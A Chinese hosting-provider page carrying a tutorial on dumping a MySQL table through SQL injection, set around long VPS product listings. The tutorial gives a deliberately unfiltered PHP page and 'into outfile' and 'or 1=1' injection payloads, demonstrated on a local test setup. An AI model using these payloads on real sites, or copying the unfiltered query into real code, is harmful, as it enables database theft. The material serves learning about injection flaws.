香港云主机最佳企业级服务商!

ADSL拨号VPS包含了中国大陆(联通,移动,电信,)

中国香港,国外拨号VPS。

当前位置:云主机 > MYSQL >

电信ADSL拨号VPS
上饶电信拨号VPS
洛阳电信拨号VPS
威海电信拨号VPS
济南电信拨号VPS
九江电信拨号VPS
厦门电信拨号VPS
邢台电信拨号VPS
湖州电信拨号VPS
绍兴电信拨号VPS
宁波电信拨号VPS
温州电信拨号VPS
杭州电信拨号VPS
郑州电信拨号VPS
铜陵电信拨号VPS
池州电信拨号VPS
黄山电信拨号VPS
十堰电信拨号VPS
荆门电信拨号VPS
莆田电信拨号VPS
三明电信拨号VPS
永州电信拨号VPS
张家界电信拨号VPS
常德电信拨号VPS
昆明电信拨号VPS
丽江电信拨号VPS
马鞍山电信拨号VPS
宣城电信拨号VPS
合肥电信拨号VPS
淮北电信拨号VPS
泰州电信拨号VPS
南通电信拨号VPS
南京电信拨号VPS
扬州电信拨号VPS
宿迁电信拨号VPS
镇江电信拨号VPS
苏州电信拨号VPS
淮安电信拨号VPS
盐城电信拨号VPS
包头电信拨号VPS
海口电信拨号VPS
江门电信拨号VPS
眉山电信拨号VPS
德阳电信拨号VPS
衢州电信拨号VPS
上海电信拨号VPS
桂林电信拨号VPS
成都电信拨号VPS
鞍山电信拨号VPS
福州电信拨号VPS
柳州电信拨号VPS
无锡电信拨号VPS
乌兰察布电信拨号VPS
深圳电信拨号VPS
河源电信拨号VPS
秦皇岛电信拨号VPS
徐州电信拨号VPS
台州电信拨号VPS
芜湖电信拨号VPS
蚌埠电信拨号VPS
潮州电信拨号VPS
重庆电信拨号VPS
连云港电信拨号VPS
绵阳电信拨号VPS
泰安电信拨号VPS
晋城电信拨号VPS
广州电信拨号VPS
联通ADSL拨号VPS
北京联通拨号VPS
滨州联通拨号VPS
莱芜联通拨号VPS
鞍山联通拨号VPS
连云港联通拨号VPS
海口联通拨号VPS
徐州联通拨号VPS
重庆联通拨号VPS
上海联通拨号VPS
西昌联通拨号VPS
南充联通拨号VPS
枣庄联通拨号VPS
抚顺联通拨号VPS
唐山联通拨号VPS
保定联通拨号VPS
廊坊联通拨号VPS
武汉联通拨号VPS
泰安联通拨号VPS
雅安联通拨号VPS
盘锦联通拨号VPS
泰州联通拨号VPS
移动ADSL拨号VPS
盐城移动拨号VPS
莱芜移动拨号VPS

利用SQL注入漏洞拖库的方法


时间:2020-11-02 13:29 作者:admin


想在本地测试的话,可以在此免积分下载:利用SQL注入漏洞拖库
同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。
数据库中建立一张表:
复制代码 代码如下:
CREATE TABLE `article` (
`articleid` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',
`content` text CHARACTER SET utf8 NOT NULL,
PRIMARY KEY (`articleid`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

在表中插入数据的操作我就不贴代码了,可以去下载下来直接导入到数据库
接下来,写一个处理用户请求的页面,这里,我们故意不过滤用户提交过来的数据,留下个SQL注入漏洞用来测试。
代码如下:
复制代码 代码如下:
<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
$id=$_GET['id'];//id未经过滤
$conn=mysql/' target='_blank'>mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
MySQL_select_db($dbname,$conn);
mysql_query('set names utf8');
$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_query($sql,$conn);
$row = mysql_fetch_array($result);
echo "<p>利用SQL注入漏洞拖库<p>";
if (!$row){
echo "该记录不存在";
exit;
}
echo "标题<br>".$row['title']."<p>";
echo "内容<br>".$row['content']."<p>";
?>

我们直接在浏览器中输入:
http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1
即可访问article表中id为1的一条记录
访问结果如下:

接下来,我们就利用这个漏洞(不知道该漏洞的情况下,只能通过工具+手工检测),演示一下如何将article表下载下来。
在地址栏中输入:' into outfile 'e:/sql.txt'%23
分析:%23是#的ASCII码,由于在地址栏中直接输入#后到数据库系统中会变成空,需要在地址栏中输入%23,那么才会变成#,进而注释掉后面的sql语句。
运行之后,打开E盘,发现多了一个sql.txt文件,打开之后,里面就是表article中的一条记录。
为什么只有一条记录呢?难道该数据表就只有一条记录?不是这样的,因为我们只检索id为1的一条记录而已,那么能否将article表中的所有记录一次性全部下载下来呢?
答案是可以的,只要你的构造的SQL语句足够灵活(再次提出了构造SQL语句的灵活性)。
分析一下,当在URL地址栏中输入'into outfile 'e:/sql.txt'%23的时候,合并到sql查询语句中变为:
SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'
仔细分析下之后,我们可以这样子构造SQL语句:
SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'
这样的话,无论如何WHERE子句总是为真,换句话说,该sql语句等价于如下:
SELECT * FROM article into outfile 'e:/whf.txt'#'
懂了吧,该sql语句在先执行select语句,将表article中的所以内容全部检索出来,然后再执行into outfile 'e:/whf.txt'#'将内容导出来。
不信的话,你执行下……
利用SQL注入漏洞,我们可以猜测表名,列名,用户的密码长度(LEFT函数)等等,当然了,如果能直接向以上的演示那样将表中的数据全部导出的话就没必要去猜表名列名等等。
有点累了,就写到这里了。
利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度,正如文章开头所说,权当总结,别无它意。 (责任编辑:admin)






帮助中心
会员注册
找回密码
新闻中心
快捷通道
域名登录面板
虚机登录面板
云主机登录面板
关于我们
关于我们
联系我们
联系方式

售前咨询:17830004266(重庆移动)

企业QQ:383546523

《中华人民共和国工业和信息化部》 编号:ICP备00012341号

Copyright © 2002 -2018 香港云主机 版权所有
声明:香港云主机品牌标志、品牌吉祥物均已注册商标,版权所有,窃用必究

云官方微信

在线客服

  • 企业QQ: 点击这里给我发消息
  • 技术支持:383546523

  • 公司总台电话:17830004266(重庆移动)
  • 售前咨询热线:17830004266(重庆移动)